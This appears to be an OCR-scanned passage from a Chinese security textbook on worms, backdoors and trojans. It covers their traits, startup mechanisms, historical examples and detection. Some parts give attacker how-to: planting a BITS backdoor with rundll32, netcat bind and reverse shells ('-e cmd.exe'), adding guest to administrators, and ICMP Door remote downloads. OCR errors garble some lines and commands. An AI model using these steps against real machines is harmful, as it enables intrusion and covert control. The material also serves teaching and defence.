(1) 在 网 段 的 选择 上 ,可 以 主要 对 当前 主机 所 在 网 段 进行 扫描 ,对 外 网 段 随机 选择 几 个 
小 的 IP 地 址 段 进行 扫描 。 

(2) 对 扫描 次 数 进行 限制 。 

(3) 将 扫描 分 布 在 不 同 的 时 间 段 进行 ,不 集中 在 某 一 时 间 内 。 

(4) 针对 不 同 的 漏洞 设计 不 同 的 探测 包 ,提高 扫描 效率 。 例 如 对 远程 缓冲 区 溢出 漏洞 ， 
通过 发 出 溢出 代码 进行 探测 ;对 Web CGI 漏洞 ,发 出 一 个 特殊 的 HTTP 请 求 探测 。 


2.3.4 网 络 蠕虫 特征 


网 络 蠕虫 具有 主动 攻击 、 利 用 漏洞 .拥塞 网 络 .消耗 系统 资源 、 留 下 安全 隐患 ,行踪 隐蔽 、 
反复 性 和 破坏 性 等 特征 。 

主动 攻击 是 指 从 搜索 漏洞 到 利用 搜索 结果 渗透 .复制 副本 到 目标 系统 的 整个 攻击 流程 
全 由 蠕虫 自身 主动 完成 。 利 用 漏洞 是 蠕虫 获得 目标 主机 的 相应 权限 ,使 复制 和 传播 时 虫 成 
为 可 能 的 途径 。 拥 塞 网 络 是 蠕虫 传播 的 过 程 中 将 会 产生 大 量 的 网 络 数据 流量 ,以 判断 计算 
机 存活 、 特 定 服务 和 漏洞 是 否 存在 等 ,同时 攻击 也 可 以 产生 大 量 流量 。 消 耗 系统 资源 是 指 里 
虫 搜索 漏洞 .感染 目标 主机 需要 消耗 一 定 的 计算 机 系统 资源 。 安 全 隐患 指 大 部 分 蠕虫 会 搜 
集 , 扩 散 、 暴 露 系统 敏感 信息 (如 用 户 信息 等 ), 并 在 系统 中 留 下 后 门 。 行 踪 隐 项 是 蠕虫 的 传 
播 过 程 不 需要 用 户 的 辅助 工作 ,用 户 基本 上 不 可 察觉 。 反 复 性 是 即使 清除 了 蠕虫 ,如 果 不 修 
复 系统 的 漏洞 会 重新 被 感染 。 破 坏 性 是 指 越 来 越 多 的 蠕虫 开始 包含 攻击 代码 ,破坏 目标 计 
算 机 系统 。 

病毒 和 蠕虫 比较 如 表 2. 2 所 示 ,病毒 不 能 自我 传播 ,具有 文件 破坏 性 ,需要 宿主 来 激 
活 , 使 用 系统 正常 的 功能 ,如 CIH 病毒 、Funlove、 杀 手 13 .求职 信 病毒 等 ;而 蠕虫 可 以 自我 
传播 ,不 具有 文件 破坏 性 ,不 需要 宿主 激活 , 它 利用 的 是 系统 漏洞 ,如 红色 代码 .蠕虫 王 、 
冲击 波 和 震荡 波 。 
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表 2.2 病毒 和 蠕虫 的 对 比 


性 质 病 毒 蠕虫 
存在 形式 寄生 独立 个 体 
复制 机 制 插入 到 宿主 程序 (文件 ) 中 自身 的 复制 
传染 机 制 宿主 程序 运行 系统 存在 漏洞 (vulnerability) 
搜索 机 制 针对 本 地 文件 针对 网 络 上 的 其 他 计算 机 
触发 传染 计算 机 使 用 者 程序 自身 
影响 重点 文件 系统 网 络 性 能 ,系统 性 能 
计算 机 使 用 者 角色 病毒 传播 中 的 关键 环节 无 关 
防治 措施 从 宿主 文件 中 摘除 为 系统 打 补丁 (Patch) 
对 抗 主体 计算 机 使 用 者 , 反 病毒 厂商 系统 提供 商 ,网 络 管理 人 员 


2.3.5 ”网络 蠕虫 防御 和 清 


网 络 蠕虫 防御 和 清除 采取 如 下 措施 : 

(1) 给 系统 漏洞 打 补 丁 。 蠕 虫 病毒 大 多 数 都 是 利用 系统 漏洞 进行 传播 的 ,因此 在 清除 
蠕虫 病毒 之 前 必须 将 蠕虫 病毒 利用 的 相关 漏洞 进行 修补 。 

(2) 清除 正在 运行 的 蠕虫 进程 。 

(3) 删除 蠕虫 病毒 的 自 启动 项 。 

(4) 删除 蠕虫 文件 。 可 以 通过 蠕虫 在 注册 表 的 键 值 知道 病毒 的 躲藏 位 置 ,关闭 正在 运 
行 的 蠕虫 进程 并 删除 对 应 文件 ,也 可 以 借助 于 相关 工具 删除 。 

(5) 利用 防护 工具 。 如 杀毒 软件 .防火墙 软 件 ,禁止 不 必要 的 服务 ,监控 恶意 流量 。 

因此 ,网 络 蠕虫 具有 如 下 生命 周期 : 

(1) 慢 速 发 展 阶段 。 漏 洞 被 蠕虫 设计 者 发 现 , 并 设计 针对 该 漏洞 的 蠕虫 发 布 于 互联 网 ， 
开始 感染 。 

(2) 快速 发 展 阶段 。 如 果 每 个 感染 蠕虫 的 可 以 扫描 并 感染 的 主机 数 为 W,n 为 感染 的 
次 数 ,那么 感染 主机 数 扩展 速度 为 原 " ,感染 蠕虫 的 机 器 成 指数 过 急 剧 增长 。 

(3) 缓慢 消失 阶段 。 随 着 网 络 蠕虫 的 爆发 和 流行 ,人 们 通过 分 析 蠕 虫 的 传播 机 制 ,采取 
一 定 措施 及 时 更 新 补丁 包 ,删除 本 机 存在 的 蠕虫 ,感染 蠕虫 数量 开始 缓慢 减少 。 


2.3.6 网络 蠕虫 举例 


1. 魔 波 (Worm. Mocbot. a /b) 病 毒 

魔 波 病毒 是 利用 微软 Windows 操作 系统 MS06-040 漏洞 传播 ,计算 机 中 毒 后 的 症状 表 
现 为 ， 

(1) 运行 后 生成 m%\wgareg. exe 文件 ,添加 系统 服务 为 wgareg ,并 通过 修改 注册 表 信 
息 降低 系统 安全 等 级 。 

(2) 连接 黑客 指定 的 IRC 频道 ,控制 用 户 计 算 机 。 

(3) 系统 服务 崩溃 ,无 法 上 网 。 


2. 求职 信 病 毒 

“求职 信 ? 系 列 变种 病毒 利用 微软 系统 的 漏洞 ,可 以 自动 感染 ,无须 打开 附件 ,因此 危害 
性 很 大 。 具 有 很 强 的 隐蔽 性 ,注册 为 服务 进程 ,可 以 “随机应变 ?地 自动 改换 不 同 的 邮件 主题 
和 内 容 , 伪 造 虚假 信息 ,瓦解 邮件 接收 者 的 警惕 性 。 能 够 绕 开 一 些 流行 杀毒 软件 的 监控 , 检 
查 调试 跟踪 ,甚至 专门 针对 一 些 杀毒 软件 进行 攻击 。 

求职 信和 蠕虫 病毒 长 度 为 59KB。 通 常 采 用 以 下 几 种 方式 传播 : 

(1) 通过 因特网 邮件 传播 。 病 毒 搜索 当前 用 户 地 址 短 中 的 邮件 地 址 ,通过 Windows 的 
SOCKET 函数 调用 SMTP 服务 器 发 送 病毒 本 身 , 其 主题 是 随机 的 。 

(2) 通过 网 络 邻 居 共 享 目录 传播 。 让 远程 计算 机 将 它 作为 一 个 服务 启动 。 

(3) 通过 磁盘 传播 。 它 创建 专门 的 线程 感染 磁盘 ,如 果 当 前 日 期 是 奇数 月 的 13 号 ,将 
感染 系统 目录 。 

3. 冲击 波 病毒 (Wrom. MSBlast. 6176) 

冲击 波 蠕虫 病毒 长 度 为 6176B, 采 用 UPX 压缩 技术 ,使 得 病毒 体积 较 小 ,便于 在 网 络 上 
利用 RPC 漏洞 进行 快速 传播 。 

冲击 波 病毒 代码 有 如 下 功能 : 

(1) 修改 注册 表 项 HKEY_LOCAL_MACHINE \Software\ Microsoft \ Windows \ 
Current VersionYRun ,添加 键 值 "windows auto update" 一"msblast. exe" ,以 使 蠕虫 可 以 开 
机 自动 运行 。 

(2) 攻击 模块 自我 生成 IP 地 址 和 RPC 服务 默认 端口 ,为 传播 自己 做 准备 。 

(3) 监听 UDP 69 端口 , 当 有 服务 请 求 时 就 发 送 Msblast. exe 文件 。 

(4) 发 送 命令 到 远 端 目标 主机 ,以 使 其 连接 被 感染 计算 机 ,下 载 并 运行 该 病毒 。 

(5) 设置 触发 条 件 , 若 月 份 大 于 8 月 或 日 期 大 于 15 号 ,对 "Windows update. com" 实 施 
DOS 攻击 。 


2.4 后 门 病毒 


后 门 (Backdoor) 是 程序 或 系统 内 的 一 种 功能 或 途经 ,允许 没有 账号 的 用 户 或 受 限 用 户 
使 用 高 权限 甚至 根 权限 来 控制 系统 程序 。 在 软件 的 开发 阶段 ,程序 员 常常 会 在 软件 内 创建 
后 门 程序 以 便 可 以 修改 程序 设计 中 的 缺陷 。 但 是 ,如 果 这 些 后门 被 其 他 人 知道 ,或 是 在 发 布 
软件 之 前 没有 删除 后 门 程序 ,就 成 了 安全 风险 ,容易 被 黑客 当成 漏洞 进行 攻击 。 

后 门 病毒 是 一 个 允许 攻击 者 绕 过 系统 中 常规 安全 控制 机 制 ,为 攻击 者 提供 进入 目标 计 
算 机 的 访问 通道 的 一 种 计算 机 病毒 程序 。 


2.4.1 后 门 病毒 的 类 型 与 特点 


1. 后 门 病毒 类 型 

后 门 病毒 有 网 页 后 门 线程 插入 后 门 、 扩 展 后 门 .C/S 后 门 和 root kit 后 门 等 类 型 。 

网 页 后 门 是 利用 服务 器 上 正常 的 Web 服务 来 构造 自己 连接 方式 的 后 门 ,比如 ASP、cgi 
脚本 后 门 等 。 线 程 插入 后 门 是 将 后 门 程序 插入 到 系统 自身 的 某 个 服务 或 者 线程 。 扩 展 后 门 
指 在 功能 上 有 大 的 提升 , 比 普通 的 单一 功能 的 后 门 有 很 强 的 实用 性 ,能 实现 非常 多 的 安全 功 
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能 ,但 隐蔽 性 较 差 。C/S 后 门 是 采用 “客户 端 /服务 端 " 的 控制 方式 ,通过 某 种 特定 的 访问 方 
式 来 启动 后 门 ,进而 控制 主机 。root kit 后 门 是 利用 root kit 技术 获得 系统 root 访问 权限 的 
工具 后 门 ,具有 很 高 的 隐蔽 性 ,是 系统 杀手 。 

2. 后 门 病毒 特点 

。 能 绕 过 或 挫败 系统 所 有 的 安全 设置 ,登录 到 系统 。 

。 隐藏 在 用 户 系统 中 向 外 发 送信 息 , 而 且 本 身 具有 一 定 权 限 , 以 便 远程 机 器 对 本 机 的 

控制 。 
。 一般 体 积 较 小 且 功 能 都 很 单一 。 
。 不 一 定 有 自我 复制 的 动作 ,也 就 是 后 门 程序 不 一 定 会 “感染 ”其 他 计算 机 。 


2.4.2 后 门 病毒 的 工作 机 制 


1. 后 门 安装 

后 门 的 安装 可 以 采用 自己 植 信 (物理 接触 或 人 侵 之 后 ) ;通过 病毒 、 蜂 虫 和 恶意 移动 代码 
安装 ;通过 E-mail, 远程 文件 共享 .Web 下 载 等 欺骗 受害 者 自己 安装 。 

2. 后 门 的 启动 

自 启动 是 任何 恶意 程序 所 必需 具备 的 功能 之 一 ,因而 这 也 是 检测 计算 机 是 否 被 感染 恶 
意 代码 的 最 有 效 的 方式 之 一 。 启 动 有 如 下 方式 : 

(1) 添加 程序 到 “开始 ”>"“ 程 序 ”>“ 启 动 ” 选 项 。 


的 相关 启动 选项 。 

(3) 通过 修改 注册 表 启 动 键 值 。 

(4) 修改 文件 关联 的 打开 方式 。 

(5) 添加 计划 任务 。 

(6) 利用 自 定义 文件 夹 风 格 。 

(7) 注册 为 InternetExplorer 的 BHO(BrowserHelperObject) 组 件 。 

3. 后 门 的 功能 

(1) 提升 本 地 权限 。 将 攻击 者 的 访问 权 变换 为 管理 员 权 限 , 使 攻击 者 可 以 重新 设置 或 
访问 该 系统 中 的 重要 文件 。 

(2) 远程 执行 单个 命令 。 攻 击 者 通过 后 门 向 计算 机 发 送 消息 或 一 个 单独 的 命令 ,后 门 
执行 攻击 命令 并 将 输出 返回 给 攻击 者 。 

(3) 远程 命令 行 解释 器 访问 。 人 允许 攻击 者 通过 网 络 快速 直接 地 输入 受害 计算 机 的 命令 
提示 ,如 远程 Shell。 

(4) 远程 控制 GUI。 攻 击 者 可 以 通过 网 络 看 到 后 门 计算 机 的 GUI, 控 制 鼠标 的 移动 , 输 
人 对 键盘 的 操作 。 

(5) 可 能 感染 普通 执行 文件 或 系统 文件 。 

4. 后 门 的 合理 使 用 

管理 员 都 是 具有 一 定 计算 机 安全 知识 的 用 户 , 后 门 的 隐蔽 性 非常 重要 。 由 于 已 公布 的 
安全 工具 后 门 , 其 存活 期 短 , 易 成 查 杀 目标 ,因此 黑客 经 常 嵌 套 使 用 互补 的 后 门 程序 ,一般 选 
用 3389 工具 和 23 号 端口 ,综合 扩展 型 后 门 和 rootkit 应 用 。 
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2.4.3 后 门 病毒 的 举例 


1. 线程 插入 后 门 一 一 BITS 

BITS(Background Intelligent Transfer Servicer) 后 门 运 行 时 没有 进程 ,所 有 网 络 操 作 
均 插入 到 其 他 应 用 程序 的 进程 中 完成 ;平时 没有 端口 ,只 是 在 系统 中 充当 卧底 的 角色 ;提供 
正 向 连接 (端口 复 用 ) 和 反 向 连接 两 种 功能 ; 仅 适 合用 于 Windows 2000/XP/2003。 

(1) 植 入 与 卸载 。 用 3389 登录 上 肉 机 ( 指 安全 防范 较 差 的 目标 计算 机 ), 确 定 有 
SYSTEM 的 权限 ,将 BITS. DLL 复制 到 服务 器 上 ,执行 CMD 命令 rundll32. exe bits. dll， 
install 激活 ,rundll32. exe BITS. dll, Uninstall 卸载 。 

(2) 端口 复 用 。 利 用 系统 正常 的 TCP 端口 通信 和 控制 如 80、139 等 ,不 用 自己 开端 口 ， 
也 不 会 暴露 自己 的 访问 ,防火墙 也 不 会 阻拦 。 

(3) 反 向 连接 。 绕 过 防火 墙 连接 ,在 本 地 使 用 NC 监听 (如 nc -1 -p 1234) ,再 用 NC 连 
接 目标 主机 的 任何 一 个 防火 墙 允 许 的 TCP 端口 (80/139/445…) ,然后 输入 激活 命令 [email 
三 hkfx@ dancewithdolphin[L rxell]: x. x. x. x:2222] [/email] "q/hQ,4。 目 标 主 机 的 CMD 
将 会 出 现 NC 监听 的 端口 2222 ,可 以 连接 该 端口 了 。 

NC(NetCat) ,是 一 种 通用 的 网 络 连 接 工具 。 使 用 方法 : 

nc - 1 - p 5000 - ecmd.exe( 侦 听 指 定 端口 , 绑 定 执行 cnd) 

nc 127.0.0.1 5000 (连接 指定 IP 和 端口 ) 


执行 nc. exe -h 即 可 看 到 基本 格式 : 


nc[-options] hostname port[s] [-e prog] 

nc -1 -p port [options] [hostname] [port] 

部 分 选项 说 明 如 下 ， 

-d: 后 台 模 式 ;-e prog: 程序 重 定向 ,一 旦 连接 就 执行 ;-1: 监听 模式 ,用 于 入 站 连接 ;-L: 
连接 关闭 后 ,仍然 继续 监听 ;-p port: 本 地 端口 号 ;-r: 随机 本 地 及 远程 端口 。 

2. devil5( 魔 鬼 5 号 ) 

Devil5 可 自 定义 线程 插入 和 端口 ,具有 GUI 界面 ,使 用 方便 。 应 用 范围 是 Windows 
2000/XP/2003 ,一 般 插入 到 系统 自 带 的 SVCHOST。 不 能 通过 系统 自 带 端口 通信 ,执行 命 
令 比 较 麻烦 ,需要 每 次 输入 密码 而 且 不 回 显 输 入 内 容 , 很 容易 出 错 。 同 类 后 门 有 PortLess 
BackDoor。 可 用 Telnet 连接 测试 ,用 “二 ”传递 下 次 命令 用 密码 ,例如 net localgroup 
administrators guest /add 二 hkfx( 提 升 guest 账号 为 管理 员 )。 

3. 扩展 后 门 一 一 Wineggdroup shell 

扩展 后 门 通 常 集成 了 文件 上 传 /下 载 、 系 统 用 户 检测 .HTTP 访问 、 终 端 安装 .端口 开 
放 、 启 动 /停止 服务 等 功能 ,本 身 就 是 一 个 小 的 工具 包 , 功 能 强大 。 

Wineggdroup shell 的 特色 功能 有 : 进程 管理 ,可 查 / 杀 进 程 (支持 用 进程 名 或 PID 来 杀 
进程 ); 注 册 表 管理 ( 查 、 删 . 增 等 功能 ) ;服务 管理 (停止 .启动 , 枚 举 ,配置 删除 服务 等 功能 ) 
端口 到 程序 关联 功能 (fport) ;系统 重启 , 关 电 源 、 注 销 等 功能 ; 嗅 探 密 码 功能 ;安装 终端 , 修 
改 终端 端口 功能 ;端口 重 定向 功能 (多 线程 ,并 且 可 限制 连接 者 IP); HTTP 服务 功能 (多 线 
程 ,并 且 可 限制 连接 者 IP) ;Socket5 代理 功能 (支持 两 种 不 同方 式 验证 ,可 限制 连接 者 IP); 
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克隆 账号 ,检测 克隆 账户 功能 ;加 强 了 的 FindpassWord 功能 (可 以 得 到 所 有 登录 用 户 , 包 括 使 
用 克隆 账户 远程 登录 用 户 密码 ) ;HTTP 代理 (完全 匿名 ,支持 oicq、MSN 和 mirc 等 程序 ) 。 

其 他 辅助 功能 包括 HTTP 下 载 .删除 日 志 、 系 统 信息 、 恢 复 常用 关联 、 枚 举 系 统 账 户 等 。 

安装 使 用 前 ,用 它 自 带 的 EditServer. exe 程序 对 服务 端 进行 非常 详细 的 配置 ,逐个 进行 
配置 插入 线程 ,密码 IP 登录 邮件 通告 等 配置 项 。 同 类 后 门 Winshell 和 wolf, 功 能 少 ,但 更 
隐蔽 。 

4. C/S 后 门 一 一 ICMP Door 

ICMP Door 利用 ICMP 通道 进行 通信 ,不 开 任何 端口 (包括 80 号 端口 ), 只 是 利用 系统 
本 身 的 ICMP 包 进 行 控制 安装 成 系统 服务 后 ,开机 自动 运行 ,可 以 穿 透 很 多 防火 墙 ,用 于 突 
破 网 关 后 对 内 网 计算 机 的 控制 ,但 不 适合 于 服务 器 。 首 先 使 用 icmpsrv. exe -install 参数 进 
行 后 门 的 安装 ,再 使 用 icmpsend. exe IP 进行 控制 ,使 用 icmpsend 才能 激活 服务 器 程序 。 可 
以 用 [http://xxx. xxx. xxx/admin. exe-hkfx. exe |] 方式 下 载 文 件 , 保 存在 [url=file:/ 八 \ 
system32\]\\system32\[/url] 目 录 下 ,文件 名 为 hkfx. exe。 使 用 Lpslist] 列 出 远程 主机 的 
进程 名 称 和 pid; 使 用 [pskill id] 杀 进程 ;输入 普通 cmd 命令 , 则 远程 主机 也 执行 相关 的 
命令 。 

5. root kit 一 一 hacker defender 

Hacker defender 的 最 新 版 本 是 hxdf 1. 0.0 ,功能 就 是 隐藏 文件 (目录 ) 隐藏 进 程 、 隐 蔽 
服务 .隐藏 注册 键 隐藏 注册 表 键 值 .启动 程序 .增加 磁盘 剩余 空间 .隐藏 端口 后门 设置 , 实 
现 正 常 系统 TCP 端口 的 通信 ,得 到 简单 的 系统 SHELL ;配合 其 他 扩展 型 后 门 使 用 。 中 毒 后 
只 有 格式 化 重 装 系统 。 

6. 其 他 Windows 下 的 后 门 程序 

带 恶 意 后 门 的 有 CryptCat、 Tini (提供 通信 Tcp 端口 7777) 等 。 非 恶意 的 GUI 
(Graphics User Interface) 远程 控制 有 VNC (Virtual Network Computing)、 Windows 
Terminal Services.PCAnywhere、Back Orifice 2000 和 SubSeven 等 。 

最 著名 的 非 恶 意 Update 后 门 程序 要 算 微软 的 Windows Update, 它 在 开机 时 自动 连 上 
微软 网 站 ,搜集 信息 将 计算 机 的 现 况 报告 给 网 站 ,网 站 通过 其 他 程序 通知 使 用 者 是 否 有 必须 
更 新 的 文件 ,以 及 如 何 更 新 。Update 后 门 程序 只 能 为 公司 软件 版 权 使 用 ,严格 意义 上 不 算 
后 门 。 


2.4.4 检测 和 防御 后 门 启动 技术 


手工 检测 注册 表 的 启动 键 值 .启动 选项 .关联 方式 和 计划 任务 等 。 

利用 工具 Msconfig、AutoRuns 检测 ,利用 完整 性 检测 程序 GFI LANguard System 
Integrity Monitor Ionx Data Sentinel 检测 。 

防御 普通 后 门 首选 杀毒 软件 查 杀 ,培养 良好 的 安全 意识 和 习惯 ;使 用 网 络 防 火 墙 封锁 与 
端口 的 连接 , 仅 允 许 最 少数 量 的 端口 通信 通过 防火 墙 ;经 常 利用 端口 扫描 器 或 端口 查看 工具 
扫描 查找 本 地 端口 监听 程序 ,例如 Nmap、Xscan、NC、Fport、TcpView 和 IceSword 等 工具 。 

防御 无 端口 后 门 时 查找 不 寻常 的 程序 和 进程 ,利用 基于 网 络 的 IDS( 如 Snort) 查 找 隐 项 
的 后 门 命令 ;使 用 本 地 检测 嗅 探 器 (Promiscdetect. exe) 或 远程 检测 嗅 探 器 (Sentinel、 
AntiSniff) 检 测 本 地 和 网 络 中 的 混杂 模式 网 卡 , 清 除非 正常 网 卡 设置 。 
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2.5 木马 


木马 程序 是 指 隐藏 在 正常 程序 中 的 一 段 具 有 特殊 功能 的 恶意 代码 ,是 具备 破坏 和 删除 
文件 ,发送 密码 .记录 键盘 和 DoS 攻击 等 特殊 功能 的 后 门 程序 。 它 与 控制 主机 之 间 建 立 起 
连接 ,使 得 控制 者 能 够 通过 网 络 控制 受害 主机 系统 ,最 大 的 特征 在 于 隐秘 性 ,潜藏 在 目标 主 
机 里 面 却 没有 被 对 方 用 户 发 现 。 这 与 古代 希腊 特洛伊 战争 中 的 木马 战术 十 分 相似 ,因而 也 
叫 特洛伊 木马 。 


2.5.1 木马 概述 


1. 木马 的 组 成 结构 

木马 程序 欺骗 用 户 或 者 系统 管理 员 安装 ,在 计算 机 上 伪装 成 “正常 ?的 程序 运行 。 一 般 
的 木马 程序 都 包括 客户 端 和 服务 端 两 个 程序 。 

客户 端 程序 安装 在 攻击 者 机 器 上 的 部 分 ,用 于 远程 控制 肉 机 ( 同 前 ) 。 服 务 器 端 程序 是 
黑客 配置 好 的 通过 各 种 手段 植 和 人 肉 机 的 部 分 ,用 于 执行 控制 肉 机 的 操作 。 一 般 使 用 TCP/ 
IP 或 UDP 协议 通信 。 

2. 木马 的 种 类 

按照 木马 的 功能 分 类 如 下 : 

(1) 破坏 型 。 唯 一 的 功能 就 是 破坏 并 自动 删除 诸如 DLL、INI、EXE 文件 。 

(2) 密码 发 送 型 。 发 送 密码 文件 , 穷 举 法 暴力 破译 密码 : 利用 Windows API 函数 
EnumWindows 和 EnumChildWindows 对 当前 运行 的 所 有 程序 的 所 有 窗口 (包括 控件 ) 进 行 
遍历 ,通过 窗口 标题 查找 密码 输入 和 输出 .确认 输入 窗口 ;通过 ES_PASSWORD 查找 需要 输入 
的 密码 窗口 ,发 送 WM_SETTEXT 消息 模拟 输入 密码 ,发 送 WM_COMMAND 消息 模拟 单 击 
按钮 ;把 破解 密码 保存 在 一 个 文件 中 ,多 部 机 器 同时 进行 分 工 穷 举 ,直到 找到 密码 为 止 。 

(3) 远程 访问 型 。 可 以 远程 访问 并 控制 目标 主机 。 

(4) 键盘 记录 型 。 记 录 受 害 者 的 键盘 敲 击 并 且 在 LOG 文件 里 查找 密码 或 账号 ,并 具有 
邮件 发 送 功能 。 

(5) DoS 攻击 型 。 作 为 DOS 攻击 的 代理 。 

(6) 代理 型 。 用 于 再 攻击 和 控制 的 代理 ,隐藏 真正 的 黑客 。 

(7) FTP 型 。 用 于 FTP 传输 文件 。 

(8) 反 毒 对 抗 型 。 专 门 关 闭 对 方 机 器 上 运行 的 杀毒 .木马 扫描 引擎 。 

按照 连接 方式 分 为 主动 连接 型 ( 正 向 连接 型 )、 反 弹 端口 型 HTTP 隧道 型 和 跟随 连接 
型 等 。 

按照 应 用 分 为 网 游 木马 网 银 木马 .通信 木马 .广告 木马 和 后 门 木 马 等 类 型 。 

3. 木马 的 特性 

木马 程序 具有 隐藏 .欺骗 .自动 运行 .自动 恢复 .自动 收集 信息 、 智 能 动态 端口 和 传染 等 
特性 。 

隐藏 性 是 木马 的 首要 特征 。 木 马 SERVER 端 程序 在 被 控 主 机 系统 上 运行 时 会 使 用 各 
种 方法 来 隐藏 自己 。 如 安装 不 产生 图 标 、 隐 藏 进程 .访问 网 络 时 跟随 访问 等 。 
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欺骗 性 是 指 木 马 程序 借助 系统 文件 ,以 系统 服务 或 注入 系统 进程 方式 欺骗 用 户 。 

木马 程序 通过 修改 系统 配置 文件 以 及 启动 组 ,在 目标 主机 系统 启动 时 自动 运行 或 加 载 。 
很 多 的 木马 程序 具有 和 多重 备份 ,运行 有 多 个 进程 或 线程 相互 监控 ,可 以 相互 自动 恢复 。 

木马 通常 具有 搜索 Cache 中 的 口令 .设置 口令 .扫描 目标 机 器 的 IP 地 址 、 进 行 键盘 记 
录 、 远 程 注册 表 的 操作 ,以 及 锁定 鼠标 等 功能 ,用 于 自动 收集 信息 。 

木马 能 自动 打开 特别 的 端口 ,智能 地 使 用 或 变换 使 用 系统 端口 和 应 用 端口 。 结 合 病毒 
蠕虫 功能 ,可 能 具有 传染 性 。 

4. 木马 与 后 门 程序 区 别 

木马 与 后 门 程序 都 是 隐藏 在 用 户 系统 中 向 外 发 送信 息 ,而且 本 身 具 有 一 定 权限 ,以 便 远 
程 机 器 对 本 机 的 控制 。 区 别 是 : 木马 是 一 个 完整 的 软件 ,而 后 门 则 体积 较 小 且 功 能 都 很 单 
一 ;后 门 程序 仅仅 提供 远程 访问 ,而 木马 将 这 些 后 门 功能 伪装 成 某 些 其 他 良性 程序 ; 反 病 毒 
命名 后 门 为 backdoor, 而 木马 则 是 trojan。 

后 门 /木马 与 病毒 .蠕虫 的 比较 如 表 2. 3 所 示 。 


表 2.3 病毒 ,蠕虫 与 后 门 /木马 的 比较 


特 性 病 毒 蠕 里 后 门 /木马 
宿主 需要 不 需要 需要 
表现 形式 不 以 文件 形式 存在 独立 的 文件 伪装 成 其 他 文件 
传播 方式 依赖 宿主 文件 或 介质 ,被 动 自主 传播 被 动 传播 
主要 危害 破坏 数据 完整 性 ,系统 完整 性 侵占 资源 提供 访问 ,窃取 信息 
传播 速度 快 极 快 慢 

5. 木马 的 发 展 历程 


第 一 代 木 马 出 现在 网 络 发 展 的 早期 ,以 伪装 诱骗 窃取 网 络 密码 为 主 。 

第 二 代 木 马 使 用 标准 的 C/S 架构 ,提供 远程 文件 管理 .屏幕 监视 等 功能 ,在 隐藏 . 自 启 
动 和 操纵 目标 主机 等 技术 上 也 有 很 大 的 发 展 。 采 用 主动 连接 技术 ,比较 容易 被 用 户 发 现 。 
如 冰河 .BO2000 等 。 

第 三 代 木 马 不 打 开 连 接 端 口 进 行 侦 听 ,而 是 使 用 ICMP 协议 进行 通信 或 TCP 端口 反弹 
连接 技术 ,以 突破 防火 墙 的 拦截 ,增加 了 查 杀 难度 。 如 网 络 神偷 (Netthief) , 灰 合 子 木马 等 。 

第 四 代 木 马 采 用 了 更 隐蔽 的 进程 隐藏 技术 ,如 rootkit 技术 。 骨 入 木马 通过 替换 系统 程 
序 .DLL, 其 至 是 驱动 程序 ,替换 之 后 仍 能 够 提供 原来 程序 的 正常 服务 。 木 马 不 是 单独 的 进 
程 或 者 以 注册 服务 的 形式 出 现 , 无 法 通过 “任务 管理 器 "查看 到 正在 运行 的 木马 。 

第 五 代 木 马 与 病毒 .蠕虫 技术 紧密 结合 ,利用 操作 系统 漏洞 直接 实现 感染 传播 ,不 必 坎 
骗 用 户主 动 激活 。 

6. 木马 产业 链 

辅助 木马 传播 不 再 是 破坏 系统 ,“ 网 页 挂 马 ”已 经 逐渐 取代 了 病毒 ,成 了 木马 的 最 主要 传 
播 途径 。2008 年 的 总 收入 在 60 亿 元 左右 。 木 马 产业 链 的 5 个 环节 如 下 : 

(1) 漏洞 挖掘 者 。 寻 找 操作 系统 以 及 应 用 软件 的 安全 漏洞 ,一 个 0day 漏洞 (软件 商 发 
布 安全 补丁 之 前 ,被 外 界 掌握 的 有 关 操作 系统 或 应 用 软件 的 漏洞 信息 ) 在 木马 产业 的 交易 价 
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格 从 数 千 元 到 数 十 万 元 不 等 。 

(2) 木马 作者 。 购 买 或 利用 漏洞 信息 制作 木马 ,以 一 个 垄断 性 的 条 款 出 售 给 木马 播种 
环节 的 人 ,并 负责 售后 的 维护 和 更 新 ,随时 对 杀 软 进行 “ 免 杀 ”制作 ,月 收入 在 数 万 乃至 十 余 
万 元 的 级 别 。 

(3) 包 马 人 。 购 买 木马 和 网 络 流量 ,从 事 木 马 播种 ( 挂 马 ) ,取得 大 量 账号 和 虚拟 财产 用 
于 交易 

(4) 流量 商 。 包 括 很 多 不 良 网 站 的 站 长 ,主动 在 自己 网 站 “ 挂 马 ” 换 取 人 金钱 ; 受 雇 的 挂 
马 黑 客 。 

(5) 包 马 人 下 家 。 收 购 账号 ,套现 虚拟 财产 ;企业 产品 推广 。 


2.5.2 木马 控制 原理 与 技术 


1. 木马 的 工作 原理 
木马 实际 上 就 是 一 个 C/S 模式 的 程序 (里 应 外 合 )。 使 用 欺骗 技术 引诱 用 户 安装 和 运 
行 ,并 隐藏 自己 达到 远程 控制 用 户 计 算 机 的 目的 ,如 图 2. 10 所 示 , 过 程 如 下 : 


天 
Rt 
肉 机 端口 控制 i 


端口 处 于 监听 状态 
图 2.10 木马 的 工作 原理 


(1) 植 人 木马 。 首 先是 通过 网 络 或 欺骗 向 目标 主机 植 人 木马 。 

(2) 启动 木马 。 监 听 某 个 特定 的 端口 ,主动 连接 或 等 待 客 户 端 与 其 取得 连接 。 一 般 是 有 
一 个 单独 文件 需要 一 些 系统 设置 ,如 通过 修改 注册 表 或 者 其 他 的 方法 让 自己 成 为 自 启 动 程序 。 

(3) 隐藏 森马。 启动 的 同时 采取 一 定 的 隐藏 技术 ,使 通信 过 程 不 能 够 使 目标 用 户 通过 
防火 墙 等 发 现 。 

(4) 远程 控制 。 黑 客 通过 客户 端 远程 控制 木马 服务 端 达 到 其 攻击 的 目的 ,可 以 收集 目 
标 计算 机 的 敏感 信息 ,监视 目标 计算 机 运行 和 操作 ,甚至 可 以 用 来 攻击 网 络 中 的 其 他 计算 机 
系统 。 

2. 木马 欺骗 技术 

木马 欺骗 技术 是 木马 植 入 、 启 动 以 及 隐藏 自己 的 关键 技术 。 欺 骗 和 引诱 用 户 安装 和 运 
行 ,主要 有 : 

(1) 文件 名 伪装 或 类 型 欺骗 。 修 改 文件 图 标 , 如 伪装 成 . TXT. HTML 或 . jpeg; 与 
Windows 扩展 名 放 在 一 起 ,如 Beauty. jpg. exe; 模 仿 系统 中 的 其 他 文件 名 或 不 能 删除 的 进 
程 名 命名 , 如 httpd、 iexplore、 notepad、 ups、 svchost、 Csrss.exe、 services.exe、 smss.exe、 


winlogon. exe、system 和 systemidle process 等 ;利用 系统 文件 执行 搜索 顺序 进行 路 径 威胁 ， 
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如 将 木马 命名 为 explorer. exe 放 在 C:\ 下 。 

